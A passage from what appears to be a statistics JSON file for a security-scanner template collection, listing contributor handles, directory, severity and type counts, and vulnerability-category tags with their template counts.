farhi","count":4},{"name":"scent2d","count":4},{"name":"3th1c_yuk1","count":4},{"name":"lum8rjack","count":4},{"name":"wisnupramoedya","count":4},{"name":"taielab","count":3},{"name":"alifathi-h1","count":3},{"name":"vsh00t","count":3},{"name":"parth","count":3},{"name":"xianke","count":3},{"name":"charles d","count":3},{"name":"cheesymoon","count":3},{"name":"z3bd","count":3},{"name":"dudez","count":3},{"name":"sushantkamble","count":3},{"name":"andydoering","count":3},{"name":"_generic_human_","count":3},{"name":"evergreencartoons","count":3},{"name":"salts","count":3},{"name":"lucasljm2001","count":3},{"name":"ph33r","count":3},{"name":"lark-lab","count":3},{"name":"randomrobbie","count":3},{"name":"huowuzhao","count":3},{"name":"badboycxcc","count":3},{"name":"c4sper0","count":3},{"name":"emenalf","count":3},{"name":"e1a","count":3},{"name":"impramodsargar","count":3},{"name":"fxploit","count":3},{"name":"farish","count":3},{"name":"dr0pd34d","count":3},{"name":"coldfish","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"bernardofsr","count":3},{"name":"whoever","count":3},{"name":"f1tz","count":3},{"name":"true13","count":3},{"name":"atomiczsec","count":3},{"name":"skeltavik","count":3},{"name":"binaryfigments","count":3},{"name":"davidmckennirey","count":3},{"name":"swissky","count":3},{"name":"johnjhacking","count":3},{"name":"vagnerd","count":3},{"name":"jarijaas","count":3},{"name":"ambassify","count":3},{"name":"ekrause","count":3},{"name":"j3ssie","count":3},{"name":"unstabl3","count":3},{"name":"omranisecurity","count":3},{"name":"thomas_from_offensity","count":3},{"name":"arcc","count":3},{"name":"fyoorer","count":3},{"name":"splint3r7","count":3},{"name":"canberbamber","count":3},{"name":"aringo","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"0w4ys","count":3},{"name":"matt galligan","count":3},{"name":"0xkayala","count":3},{"name":"me9187","count":3},{"name":"imjust0","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"t3l3machus","count":2},{"name":"bing0o","count":2},{"name":"hetroublemakr","count":2},{"name":"davidegirardi","count":2},{"name":"c3l3si4n","count":2},{"name":"liwermor","count":2},{"name":"nuk3s3c","count":2},{"name":"korteke","count":2},{"name":"0xelkomy","count":2},{"name":"x1m_martijn","count":2},{"name":"dogancanbakir","count":2},{"name":"ree4pwn","count":2},{"name":"cckuakilong","count":2},{"name":"666asd","count":2},{"name":"martincodes-de","count":2},{"name":"amsda","count":2},{"name":"h0j3n","count":2},{"name":"redteambrasil","count":2},{"name":"luci","count":2},{"name":"shankaracharya","count":2},{"name":"thabisocn","count":2},{"name":"vavkamil","count":2},{"name":"brucelsone","count":2},{"name":"kiblyn11","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"streetofhackerr007","count":2},{"name":"d4vy","count":2},{"name":"w4cky_","count":2},{"name":"convisoappsec","count":2},{"name":"moritz nentwig","count":2},{"name":"bp0lr","count":2},{"name":"joshua rogers","count":2},{"name":"gal nagli","count":2},{"name":"serrapa","count":2},{"name":"k11h-de","count":2},{"name":"bmcel","count":2},{"name":"rafaelwdornelas","count":2},{"name":"topscoder","count":2},{"name":"ritesh_gohil(#l4stpl4y3r)","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"6mile","count":2},{"name":"zy9ard3","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"lotusdll","count":2},{"name":"0xnirvana","count":2},{"name":"maximus decimus","count":2},{"name":"0xcrypto","count":2},{"name":"codexlynx","count":2},{"name":"geekby","count":2},{"name":"foulenzer","count":2},{"name":"herry","count":2},{"name":"sbani","count":2},{"name":"afaq","count":2},{"name":"cocxanh","count":2},{"name":"christianpoeschl","count":2},{"name":"0xrudra","count":2},{"name":"raesene","count":2},{"name":"sascha brendel","count":2},{"name":"z0ne","count":2},{"name":"randomdhiraj","count":2},{"name":"egemenkochisarli","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"bananabr","count":2},{"name":"mrharshvardhan","count":2},{"name":"g4l1t0","count":2},{"name":"8arthur","count":2},{"name":"0xsapra","count":2},{"name":"wa1tf0rme","count":2},{"name":"msegoviag","count":2},{"name":"kishore-hariram","count":2},{"name":"danmcinerney","count":2},{"name":"ep1csage","count":2},{"name":"kre80r","count":2},{"name":"dheerajmadhukar","count":2},{"name":"y4er","count":2},{"name":"ayadim","count":2},{"name":"clarkvoss","count":2},{"name":"joshlarsen","count":2},{"name":"ehsahil","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"thardt-praetorian","count":2},{"name":"zomsop82","count":2},{"name":"github.com/its0x08","count":2},{"name":"socketz","count":2},{"name":"notnotnotveg","count":2},{"name":"pxmme1337","count":2},{"name":"myztique","count":2},{"name":"brenocss","count":2},{"name":"charles d.","count":2},{"name":"lstatro","count":2},{"name":"sy3omda","count":2},{"name":"udit_thakkur","count":2},{"name":"paradessia","count":2},{"name":"dahse89","count":2},{"name":"mzack9999","count":2},{"name":"koti2","count":2},{"name":"thezakman","count":2},{"name":"sinkettu","count":2},{"name":"uomogrande","count":2},{"name":"arliya","count":2},{"name":"0xsmiley","count":2},{"name":"danielmofer","count":2},{"name":"shelled","count":2},{"name":"thevillagehacker","count":2},{"name":"pbuff07","count":2},{"name":"gevakun","count":2},{"name":"joeldeleep","count":2},{"name":"supr4s","count":2},{"name":"n-thumann","count":2},{"name":"nkxxkn","count":2},{"name":"amirhossein raeisi","count":2},{"name":"dbrwsky","count":2},{"name":"parzival","count":2},{"name":"ajaysenr","count":2},{"name":"manas_harsh","count":2},{"name":"supras","count":2},{"name":"v0idc0de","count":2},{"name":"paperpen","count":2},{"name":"bsysop","count":2},{"name":"hackerarpan","count":2},{"name":"usdag","count":2},{"name":"florianmaak","count":2},{"name":"petergrifin","count":1},{"name":"mah3sec_","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"mchklt","count":1},{"name":"pussycat0","count":1},{"name":"cbadke","count":1},{"name":"0xparth","count":1},{"name":"luciannitescu","count":1},{"name":"duty_1g","count":1},{"name":"omarkurt","count":1},{"name":"napgh0st","count":1},{"name":"izn0u","count":1},{"name":"godfatherorwa","count":1},{"name":"pratik khalane","count":1},{"name":"babybash","count":1},{"name":"absshax","count":1},{"name":"jteles","count":1},{"name":"retr0","count":1},{"name":"mass0ma","count":1},{"name":"bad5ect0r","count":1},{"name":"vinit989","count":1},{"name":"alevsk","count":1},{"name":"carlosvieira","count":1},{"name":"xshuden","count":1},{"name":"defektive","count":1},{"name":"queencitycyber","count":1},{"name":"zsusac","count":1},{"name":"fpatrik","count":1},{"name":"becivells","count":1},{"name":"rinolock","count":1},{"name":"spac3wh1te","count":1},{"name":"hüseyin tintaş","count":1},{"name":"dhiyanesdk","count":1},{"name":"zeroc00i","count":1},{"name":"chron0x","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"gonski","count":1},{"name":"akokonunes","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"adamparsons","count":1},{"name":"domenicoveneziano","count":1},{"name":"jbaines-r7","count":1},{"name":"archer","count":1},{"name":"ap3r","count":1},{"name":"shiar","count":1},{"name":"liquidsec","count":1},{"name":"p-l-","count":1},{"name":"0xrod","count":1},{"name":"drewvravick","count":1},{"name":"akash.c","count":1},{"name":"arqsz","count":1},{"name":"patrick pirker","count":1},{"name":"dk999","count":1},{"name":"danigoland","count":1},{"name":"breno_css","count":1},{"name":"0xtavian","count":1},{"name":"galoget","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"hanlaomo","count":1},{"name":"ynnirc","count":1},{"name":"mesaglio","count":1},{"name":"jfbes","count":1},{"name":"mihhailsokolov","count":1},{"name":"act1on3","count":1},{"name":"dwbzn","count":1},{"name":"myst7ic","count":1},{"name":"unknown","count":1},{"name":"ahmed abou-ela","count":1},{"name":"shockwave","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"jacalynli","count":1},{"name":"sshell","count":1},{"name":"youngpope","count":1},{"name":"kaks3c","count":1},{"name":"unblvr1","count":1},{"name":"diablo","count":1},{"name":"shiva (strobes security)","count":1},{"name":"harryha","count":1},{"name":"b0rn2r00t","count":1},{"name":"banana69","count":1},{"name":"yhy0","count":1},{"name":"xiaowangsec","count":1},{"name":"miryangjung","count":1},{"name":"lbb","count":1},{"name":"chesterblue","count":1},{"name":"affix","count":1},{"name":"calumjelrick","count":1},{"name":"miroslavsotak","count":1},{"name":"wlayzz","count":1},{"name":"kareemse1im","count":1},{"name":"yiran","count":1},{"name":"savik","count":1},{"name":"husain","count":1},{"name":"hakimkt","count":1},{"name":"d4ly","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"natto97","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"nagli","count":1},{"name":"alperenkesk","count":1},{"name":"orpheus","count":1},{"name":"jcockhren","count":1},{"name":"jbertman","count":1},{"name":"mubassirpatel","count":1},{"name":"watchtowr","count":1},{"name":"secthebit","count":1},{"name":"fopina","count":1},{"name":"bywalks","count":1},{"name":"berkdusunur","count":1},{"name":"shivanshkhari","count":1},{"name":"undefl0w","count":1},{"name":"akshansh","count":1},{"name":"sttlr","count":1},{"name":"jub0bs","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"b0yd","count":1},{"name":"rschio","count":1},{"name":"daffianfo","count":1},{"name":"noamrathaus","count":1},{"name":"luskabol","count":1},{"name":"omarjezi","count":1},{"name":"hexcat","count":1},{"name":"am0nt31r0","count":1},{"name":"deena","count":1},{"name":"sicksec","count":1},{"name":"exploitation","count":1},{"name":"vulnspace","count":1},{"name":"aravind","count":1},{"name":"yaser_s","count":1},{"name":"noobexploiter","count":1},{"name":"mayank_pandey01","count":1},{"name":"lingtren","count":1},{"name":"adrianmf","count":1},{"name":"metascan","count":1},{"name":"phyr3wall","count":1},{"name":"push4d","count":1},{"name":"arr0way","count":1},{"name":"sdcampbell","count":1},{"name":"sechunt3r","count":1},{"name":"x6263","count":1},{"name":"lady_bug","count":1},{"name":"yashgoti","count":1},{"name":"exid","count":1},{"name":"petruknisme","count":1},{"name":"christbowel","count":1},{"name":"eremit4","count":1},{"name":"davidfegyver","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"m0ck3d","count":1},{"name":"dorkerdevil","count":1},{"name":"ola456","count":1},{"name":"zn9988","count":1},{"name":"hczdmr","count":1},{"name":"rumble773","count":1},{"name":"gboddin","count":1},{"name":"kr1shna4garwal","count":1},{"name":"stupidfish","count":1},{"name":"iampritam","count":1},{"name":"adnanekhan","count":1},{"name":"soyelmago","count":1},{"name":"kabirsuda","count":1},{"name":"none","count":1},{"name":"r3nz0","count":1},{"name":"regala_","count":1},{"name":"_c0wb0y_","count":1},{"name":"abdullahisik","count":1},{"name":"jeya.seelan","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"patralos","count":1},{"name":"juicypotato1","count":1},{"name":"esonhugh","count":1},{"name":"qianbenhyu","count":1},{"name":"therealtoastycat","count":1},{"name":"wabafet","count":1},{"name":"0ut0fb4nd","count":1},{"name":"juliosmelo","count":1},{"name":"n0el4kls","count":1},{"name":"dabla","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"pphuahua","count":1},{"name":"screamy","count":1},{"name":"aresx","count":1},{"name":"staticnoise","count":1},{"name":"chetgan","count":1},{"name":"ahmetpergamum","count":1},{"name":"adilsoybali","count":1},{"name":"bughuntersurya","count":1},{"name":"abbas.heybati","count":1},{"name":"nobody","count":1},{"name":"dievus","count":1},{"name":"sec_hawk","count":1},{"name":"pdp","count":1},{"name":"shivampand3y","count":1},{"name":"ofjaaah","count":1},{"name":"apt-mirror","count":1},{"name":"sorrowx3","count":1},{"name":"jc175","count":1},{"name":"marcio mendes","count":1},{"name":"mantissts","count":1},{"name":"co0nan","count":1},{"name":"pascalheidmann","count":1},{"name":"kchason","count":1},{"name":"droberson","count":1},{"name":"michael wedl","count":1},{"name":"tim_koopmans","count":1},{"name":"sospiro","count":1},{"name":"millermedia","count":1},{"name":"luqman","count":1},{"name":"higor melgaço","count":1},{"name":"0xcharan","count":1},{"name":"ayadi","count":1},{"name":"willd96","count":1},{"name":"dale clarke","count":1},{"name":"jaskaran","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"0xprial","count":1},{"name":"invisiblethreat","count":1},{"name":"micha3lb3n","count":1},{"name":"mlec","count":1},{"name":"rivalsec","count":1},{"name":"kaizensecurity","count":1},{"name":"imhunterand","count":1},{"name":"allenwest24","count":1},{"name":"ok_bye_now","count":1},{"name":"philippdelteil","count":1},{"name":"apple","count":1},{"name":"gpiechnik2","count":1},{"name":"elmahdi","count":1},{"name":"ldionmarcil","count":1},{"name":"8authur","count":1},{"name":"alex","count":1},{"name":"failopen","count":1},{"name":"sherlocksecurity","count":1},{"name":"ohlinge","count":1},{"name":"lrtk-coder","count":1},{"name":"nytr0gen","count":1},{"name":"s1r1u5_","count":1},{"name":"guax1","count":1},{"name":"anonymous","count":1},{"name":"ndmalc","count":1},{"name":"schniggie","count":1},{"name":"vikas kundu","count":1},{"name":"null_hypothesis","count":1},{"name":"qlkwej","count":1},{"name":"jiheon-dev","count":1},{"name":"sw0rk17","count":1},{"name":"smaranchand","count":1},{"name":"daviey","count":1},{"name":"technicaljunkie","count":1},{"name":"evolutionsec","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"anon-artist","count":1},{"name":"byobin","count":1},{"name":"shreyapohekar","count":1},{"name":"elouhi","count":1},{"name":"xeldax","count":1},{"name":"elder tao","count":1},{"name":"1nf1n7y","count":1},{"name":"xstp","count":1},{"name":"vzamanillo","count":1},{"name":"stux","count":1},{"name":"ooooooo_q","count":1},{"name":"furkansenan","count":1},{"name":"fq_hsu","count":1},{"name":"whotwagner","count":1},{"name":"puben","count":1},{"name":"f0xy","count":1},{"name":"amnotacat","count":1},{"name":"charanrayudu","count":1},{"name":"makyotox","count":1},{"name":"luqmaan hadia","count":1},{"name":"ipanda","count":1},{"name":"rotemreiss","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"pwnwithlove","count":1},{"name":"exceed","count":1},{"name":"kagamigawa","count":1},{"name":"httpvoid","count":1},{"name":"mordavid","count":1},{"name":"whynotke","count":1},{"name":"kresec","count":1},{"name":"knassar702","count":1},{"name":"prettyboyaaditya","count":1},{"name":"arjunchandarana","count":1},{"name":"th3r4id","count":1},{"name":"borna nematzadeh","count":1},{"name":"aron molnar","count":1},{"name":"rotembar","count":1},{"name":"mukundbhuva","count":1},{"name":"_darrenmartyn","count":1},{"name":"0xceeb","count":1},{"name":"open-sec","count":1},{"name":"infosecsanyam","count":1},{"name":"j33n1k4","count":1},{"name":"f1she3","count":1},{"name":"toufik-airane","count":1},{"name":"elitebaz","count":1},{"name":"nerrorsec","count":1},{"name":"opencirt","count":1},{"name":"marcos_iaf","count":1},{"name":"sanineng","count":1},{"name":"mayankpandey01","count":1},{"name":"mbmy","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"xc1ym","count":1},{"name":"udinchan","count":1},{"name":"freakyclown","count":1},{"name":"majidmc2","count":1},{"name":"palanichamy_perumal","count":1},{"name":"0xteles","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"jrolf","count":1},{"name":"professorabhay","count":1},{"name":"jeya seelan","count":1},{"name":"kiransau","count":1},{"name":"drfabiocastro","count":1},{"name":"nan-kl","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"dawid-czarnecki","count":1},{"name":"david botelho mariano","count":1},{"name":"fur1na","count":1},{"name":"mohammedsaneem","count":1},{"name":"blckraven","count":1},{"name":"bartu utku sarp","count":1},{"name":"houdinis","count":1},{"name":"5up3r541y4n","count":1},{"name":"clment cruchet","count":1},{"name":"jaimin gondaliya","count":1},{"name":"tehtbl","count":1},{"name":"hyunsoo-ds","count":1},{"name":"unp4ck","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"high","count":1},{"name":"furkansayim","count":1},{"name":"af001","count":1},{"name":"booboohq","count":1},{"name":"jadu101","count":1},{"name":"danfaizer","count":1},{"name":"barthy.koeln","count":1},{"name":"lamscun","count":1},{"name":"zinminphy0","count":1},{"name":"d0rkerdevil","count":1},{"name":"jas37","count":1},{"name":"compr00t","count":1},{"name":"th3.d1p4k","count":1},{"name":"axrk","count":1},{"name":"official_blackhat13","count":1},{"name":"floriandewald","count":1},{"name":"naglis","count":1},{"name":"_harleo","count":1},{"name":"2rs3c","count":1},{"name":"carson chan","count":1},{"name":"thirukrishnan","count":1},{"name":"narluin","count":1},{"name":"andysvints","count":1},{"name":"w0tx","count":1},{"name":"mhdsamx","count":1},{"name":"mariam tariq","count":1},{"name":"oscarintherocks","count":1},{"name":"numan türle","count":1},{"name":"w8ay","count":1},{"name":"igibanez","count":1},{"name":"y0no","count":1},{"name":"bugvsme","count":1},{"name":"pudsec","count":1},{"name":"irshadahamed","count":1},{"name":"matt miller","count":1},{"name":"unkl4b","count":1},{"name":"notsoevilweasel","count":1},{"name":"ledoubletake","count":1},{"name":"hlop","count":1},{"name":"amir-h-fallahi","count":1},{"name":"hel10-web","count":1},{"name":"pry0cc","count":1},{"name":"momen eldawakhly","count":1},{"name":"0xd0ff9","count":1},{"name":"sinsinology","count":1},{"name":"rodnt","count":1},{"name":"pjborah","count":1},{"name":"zhenwarx","count":1},{"name":"ransomsec","count":1},{"name":"r3s ost","count":1},{"name":"realexp3rt","count":1},{"name":"vthiery","count":1},{"name":"couskito","count":1},{"name":"rojanrijal","count":1},{"name":"dali","count":1},{"name":"colbyjack1134","count":1},{"name":"tea","count":1},{"name":"hakluke","count":1},{"name":"aringo-bf","count":1},{"name":"thebinitghimire","count":1},{"name":"flag007","count":1},{"name":"josecosta","count":1},{"name":"justmumu","count":1},{"name":"intx0x80","count":1},{"name":"wpsec","count":1},{"name":"johndoeanonita","count":1},{"name":"nuts7","count":1},{"name":"aaronchen0","count":1},{"name":"themiddle","count":1},{"name":"nielsing","count":1},{"name":"evan rubinstien","count":1},{"name":"amirmsafari","count":1},{"name":"phillipo","count":1},{"name":"jna1","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"andirrahmani1","count":1},{"name":"b4uh0lz","count":1},{"name":"bjxsec","count":1},{"name":"kurohost","count":1},{"name":"cravaterouge","count":1},{"name":"aaban solutions","count":1},{"name":"viondexd","count":1},{"name":"carrot2","count":1},{"name":"alexrydzak","count":1},{"name":"viniciuspereiras","count":1},{"name":"amanrawat","count":1},{"name":"rubina119","count":1},{"name":"michal-mikolas","count":1},{"name":"revblock","count":1},{"name":"jonathanwalker","count":1},{"name":"ruppde","count":1},{"name":"iphantasmic","count":1},{"name":"mohsen yaghoubi","count":1},{"name":"paper-pen","count":1},{"name":"un-fmunozs","count":1},{"name":"sak1","count":1},{"name":"sickwell","count":1},{"name":"hardik-rathod","count":1},{"name":"ramondunker","count":1},{"name":"manuelbua","count":1},{"name":"brabbit10","count":1},{"name":"h4kux","count":1},{"name":"noah @thesubtlety","count":1},{"name":"piyushchhiroliya","count":1},{"name":"miguelsegoviagil","count":1},{"name":"shelld3v","count":1},{"name":"joaonevess","count":1},{"name":"ilovebinbash","count":1},{"name":"yavolo","count":1},{"name":"ky9oss","count":1},{"name":"olewagner","count":1},{"name":"k3rwin","count":1},{"name":"zeyad azima","count":1},{"name":"mys7ic","count":1},{"name":"west-wise","count":1},{"name":"shifacyclewla","count":1},{"name":"bjhulst","count":1},{"name":"zandros0","count":1},{"name":"mr.bobo hp","count":1},{"name":"tirtha_mandal","count":1},{"name":"yusakie","count":1},{"name":"dmartyn","count":1},{"name":"denandz","count":1},{"name":"ringo","count":1},{"name":"remonsec","count":1},{"name":"tangxiaofeng7","count":1},{"name":"hotpot","count":1},{"name":"xcapri","count":1},{"name":"udyz","count":1},{"name":"hazana","count":1},{"name":"notwhy","count":1},{"name":"djoevanka","count":1},{"name":"mammad_rahimzada","count":1},{"name":"lark lab","count":1},{"name":"s1r1us","count":1},{"name":"osamahamad","count":1},{"name":"skylark-lab","count":1},{"name":"win3zz","count":1},{"name":"yashanand155","count":1},{"name":"lixts","count":1},{"name":"fmunozs","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"ramkrishna sawant","count":1},{"name":"harshinsecurity","count":1},{"name":"geraldino2","count":1},{"name":"kiks7","count":1},{"name":"yuansec","count":1},{"name":"kailashbohara","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"francescocarlucci","count":1},{"name":"lethargynavigator","count":1},{"name":"ahmed sherif","count":1},{"name":"manasmbellani","count":1},{"name":"ptonewreckin","count":1},{"name":"thelicato","count":1},{"name":"aayush vishnoi","count":1},{"name":"yashvardhantripathi","count":1},{"name":"0xceba","count":1},{"name":"ph33rr","count":1},{"name":"mabdullah22","count":1},{"name":"h4sh5","count":1},{"name":"tirtha","count":1},{"name":"arall","count":1},{"name":"0h1in9e","count":1},{"name":"pepitoh","count":1},{"name":"mrcl0wnlab","count":1},{"name":"0xh7ml","count":1},{"name":"ling","count":1},{"name":"erikowen","count":1},{"name":"hateshape","count":1},{"name":"erethon","count":1},{"name":"retr02332","count":1},{"name":"caon","count":1}],"directory":[{"name":"http","count":7663},{"name":"file","count":402},{"name":"workflows","count":191},{"name":"network","count":135},{"name":"cloud","count":134},{"name":"code","count":81},{"name":"javascript","count":61},{"name":"ssl","count":29},{"name":"dast","count":25},{"name":"dns","count":22},{"name":"headless","count":12},{"name":"TEMPLATES-STATS.json","count":1},{"name":"cves.json","count":1},{"name":"passive","count":1},{"name":"contributors.json","count":1}],"severity":[{"name":"info","count":3789},{"name":"high","count":1816},{"name":"medium","count":1578},{"name":"critical","count":1071},{"name":"low","count":271},{"name":"unknown","count":40}],"types":[{"name":"file","count":402},{"name":"dns","count":25}]} +{"tags":[{"name":"cve","count":2604},{"name":"panel","count":1173},{"name":"wordpress","count":1008},{"name":"exposure","count":971},{"name":"xss","count":919},{"name":"wp-plugin","count":878},{"name":"osint","count":805},{"name":"tech","count":703},{"name":"lfi","count":685},{"name":"misconfig","count":678},{"name":"rce","count":624},{"name":"edb","count":597},{"name":"packetstorm","count":547},{"name":"wpscan","count":508},{"name":"cve2021","count":493},{"name":"cve2022","count":475},{"name":"wp","count":437},{"name":"cve2023","count":400},{"name":"sqli","count":378},{"name":"unauth","count":372},{"name":"authenticated","count":345},{"name":"file","count":345},{"name":"detect","count":325},{"name":"intrusive","count":315},{"name":"login","count":306},{"name":"kev","count":278},{"name":"cve2020","count":256},{"name":"token-spray","count":243},{"name":"default-login","count":225},{"name":"config","count":225},{"name":"top-200","count":224},{"name":"oast","count":223},{"name":"devops","count":212},{"name":"osint-social","count":210},{"name":"malware","count":209},{"name":"apache","count":201},{"name":"network","count":199},{"name":"token","count":194},{"name":"","count":192},{"name":"cve2018","count":170},{"name":"cloud","count":169},{"name":"iot","count":168},{"name":"cve2019","count":163},{"name":"cve2024","count":157},{"name":"keys","count":156},{"name":"install","count":153},{"name":"joomla","count":148},{"name":"redirect","count":139},{"name":"tcp","count":138},{"name":"aws","count":135},{"name":"auth-bypass","count":134},{"name":"ssrf","count":122},{"name":"amazon","count":118},{"name":"phishing","count":117},{"name":"cms","count":115},{"name":"files","count":114},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"top-100","count":101},{"name":"aws-cloud-config","count":91},{"name":"disclosure","count":90},{"name":"linux","count":85},{"name":"code","count":81},{"name":"local","count":80},{"name":"seclists","count":79},{"name":"privesc","count":79},{"name":"tokens","count":78},{"name":"takeover","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":74},{"name":"kubernetes","count":71},{"name":"oss","count":69},{"name":"js","count":68},{"name":"cisco","count":67},{"name":"enum","count":65},{"name":"adobe","count":64},{"name":"ir","count":62},{"name":"k8s","count":62},{"name":"huntr","count":60},{"name":"cve2015","count":59},{"name":"atlassian","count":59},{"name":"cve2016","count":57},{"name":"detection","count":57},{"name":"google","count":56},{"name":"c2","count":56},{"name":"vmware","count":56},{"name":"logs","count":48},{"name":"tenable","count":48},{"name":"log4j","count":47},{"name":"vulhub","count":46},{"name":"hackerone","count":46},{"name":"generic","count":45},{"name":"aem","count":45},{"name":"php","count":45},{"name":"osint-gaming","count":45},{"name":"cve2014","count":44},{"name":"deserialization","count":44},{"name":"jndi","count":44},{"name":"cnvd","count":44},{"name":"debug","count":44},{"name":"traversal","count":43},{"name":"oa","count":42},{"name":"osint-hobby","count":42},{"name":"microsoft","count":42},{"name":"plugin","count":42},{"name":"osint-porn","count":42},{"name":"springboot","count":41},{"name":"misc","count":40},{"name":"injection","count":40},{"name":"listing","count":38},{"name":"miscellaneous","count":38},{"name":"jira","count":37},{"name":"cti","count":37},{"name":"ibm","count":36},{"name":"osint-misc","count":35},{"name":"fuzz","count":34},{"name":"sap","count":34},{"name":"k8s-cluster-security","count":34},{"name":"ssl","count":33},{"name":"dlink","count":32},{"name":"tls","count":32},{"name":"devsecops","count":32},{"name":"osint-tech","count":31},{"name":"osint-coding","count":30},{"name":"file-upload","count":30},{"name":"wp-theme","count":30},{"name":"ec2","count":30},{"name":"api","count":28},{"name":"fortinet","count":28},{"name":"gitlab","count":28},{"name":"proxy","count":27},{"name":"lfr","count":27},{"name":"citrix","count":27},{"name":"dns","count":27},{"name":"bestwebsoft","count":27},{"name":"ssh","count":26},{"name":"admin","count":26},{"name":"manageengine","count":26},{"name":"zohocorp","count":26},{"name":"cve2012","count":26},{"name":"firewall","count":26},{"name":"xxe","count":25},{"name":"weaver","count":25},{"name":"zoho","count":25},{"name":"dast","count":25},{"name":"osint-finance","count":24},{"name":"printer","count":24},{"name":"osint-business","count":24},{"name":"osint-images","count":24},{"name":"osint-shopping","count":24},{"name":"yonyou","count":23},{"name":"tomcat","count":23},{"name":"audit","count":23},{"name":"stored-xss","count":23},{"name":"info-leak","count":23},{"name":"cicd","count":22},{"name":"github","count":22},{"name":"prestashop","count":22},{"name":"s3","count":22},{"name":"msf","count":21},{"name":"weblogic","count":21},{"name":"ecology","count":21},{"name":"camera","count":20},{"name":"ftp","count":20},{"name":"jenkins","count":20},{"name":"wavlink","count":20},{"name":"struts","count":19},{"name":"hp","count":19},{"name":"apt","count":19},{"name":"grafana","count":19},{"name":"confluence","count":19},{"name":"rukovoditel","count":19},{"name":"vpn","count":19},{"name":"coldfusion","count":18},{"name":"backdoor","count":18},{"name":"node.js","count":18},{"name":"ruijie","count":18},{"name":"cve2011","count":18},{"name":"android","count":18},{"name":"osint-music","count":18},{"name":"zyxel","count":17},{"name":"mail","count":17},{"name":"headless","count":17},{"name":"microweber","count":17},{"name":"honeypot","count":17},{"name":"nginx","count":17},{"name":"magento","count":17},{"name":"backup","count":17},{"name":"azure","count":17},{"name":"bypass","count":17},{"name":"ssti","count":17},{"name":"osint-blog","count":16},{"name":"dashboard","count":16},{"name":"status","count":16},{"name":"cve2009","count":16},{"name":"setup","count":16},{"name":"jarm","count":16},{"name":"service","count":16},{"name":"xwiki","count":16},{"name":"rconfig","count":16},{"name":"netgear","count":16},{"name":"alibaba","count":16},{"name":"docker","count":15},{"name":"cve2013","count":15},{"name":"seeyon","count":15},{"name":"nagios","count":15},{"name":"installer","count":15},{"name":"redhat","count":15},{"name":"tongda","count":15},{"name":"cve2008","count":15},{"name":"java","count":15},{"name":"woocommerce","count":15},{"name":"ivanti","count":15},{"name":"moosocial","count":15},{"name":"ruby","count":15},{"name":"cnvd2021","count":15},{"name":"dell","count":14},{"name":"npm","count":14},{"name":"icewarp","count":14},{"name":"osint-health","count":14},{"name":"redis","count":14},{"name":"node","count":14},{"name":"domainmod","count":14},{"name":"rds","count":14},{"name":"osint-art","count":14},{"name":"jboss","count":14},{"name":"git","count":14},{"name":"nodejs","count":14},{"name":"smtp","count":14},{"name":"creds-stuffing","count":14},{"name":"login-check","count":14},{"name":"kafka","count":13},{"name":"cuppacms","count":13},{"name":"osint-political","count":13},{"name":"cache","count":13},{"name":"airflow","count":13},{"name":"windows","count":13},{"name":"laravel","count":13},{"name":"postgresql","count":13},{"name":"fuzzing","count":13},{"name":"hashicorp","count":13},{"name":"rails","count":13},{"name":"mysql","count":13},{"name":"graphql","count":13},{"name":"abstractapi","count":13},{"name":"osint-dating","count":13},{"name":"auth","count":13},{"name":"sonicwall","count":13},{"name":"cuppa","count":13},{"name":"fortigate","count":13},{"name":"newrelic","count":12},{"name":"jetbrains","count":12},{"name":"ofbiz","count":12},{"name":"netsweeper","count":12},{"name":"doppler","count":12},{"name":"phpgurukul","count":12},{"name":"vbulletin","count":12},{"name":"drupal","count":12},{"name":"deployments","count":12},{"name":"hikvision","count":12},{"name":"spring","count":12},{"name":"webserver","count":12},{"name":"zimbra","count":12},{"name":"smb","count":12},{"name":"fastjson","count":11},{"name":"xstream","count":11},{"name":"progress","count":11},{"name":"iam","count":11},{"name":"thinkphp","count":11},{"name":"jolokia","count":11},{"name":"osint-video","count":11},{"name":"iis","count":11},{"name":"prometheus","count":11},{"name":"dedecms","count":11},{"name":"django","count":11},{"name":"glpi","count":11},{"name":"digitalocean","count":10},{"name":"instrusive","count":10},{"name":"elasticsearch","count":10},{"name":"xstream_project","count":10},{"name":"samsung","count":10},{"name":"dahua","count":10},{"name":"solr","count":10},{"name":"solarview","count":10},{"name":"crlf","count":10},{"name":"symfony","count":10},{"name":"blind","count":10},{"name":"db","count":10},{"name":"dropbox","count":10},{"name":"phpmyadmin","count":10},{"name":"sitecore","count":10},{"name":"zabbix","count":10},{"name":"servicenow","count":9},{"name":"joomla\\!","count":9},{"name":"gateway","count":9},{"name":"cnvd2020","count":9},{"name":"elastic","count":9},{"name":"python","count":9},{"name":"wso2","count":9},{"name":"bitbucket","count":9},{"name":"vcenter"